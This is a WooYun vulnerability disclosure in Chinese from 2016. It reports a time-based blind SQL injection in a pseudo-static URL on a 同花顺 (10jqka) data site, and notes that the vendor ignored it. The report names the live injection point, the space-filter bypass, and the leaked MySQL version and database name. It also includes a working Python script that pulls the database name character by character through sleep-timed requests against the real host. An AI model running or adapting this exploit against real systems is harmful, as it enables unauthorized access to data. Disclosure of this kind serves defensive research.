当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0184816

漏洞标题:同花顺某站伪静态SQL注入(附验证脚本)

相关厂商:同花顺

漏洞作者: null_z

提交时间:2016-03-15 09:27

修复时间:2016-03-20 09:30

公开时间:2016-03-20 09:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-15: 细节已通知厂商并且等待厂商处理中
2016-03-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

。。。

详细说明:

注入点 http://data.10jqka.com.cn/ifyyb/yybstockxt/code/600811/date/1*
注入参数 打星号的位置
过滤了空格用+号代替,注意缓存。
True

屏幕快照 2016-03-15 08.57.24.png


False

屏幕快照 2016-03-15 08.57.37.png

漏洞证明:

版本 5.5.27

屏幕快照 2016-03-15 09.08.25.png


数据库 datacenfer

屏幕快照 2016-03-15 09.09.29.png


#!/usr/bin/env python
#-*-coding:utf-8-*-
import string
import requests
import time
payloads = string.ascii_lowercase + string.digits + '_@. '
res = ''
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.69 Safari/537.36'}
for i in range(1, 20):
for p in payloads:
start_time = time.time()
url = "http://data.10jqka.com.cn/ifyyb/yybstockxt/code/600811/date/1'+if((now()=sysdate())-(mid(database(),{},1)='{}'),1,sleep(1*3))+'1".format(i, p)
req = requests.get(url)
print req.url
if time.time() - start_time > 3:
res = res + p
print "\n" + res + "\n"
break
print "\n\n[Finish]: " + res

修复方案:

。。。

版权声明:转载请注明来源 null_z@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-03-20 09:30

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无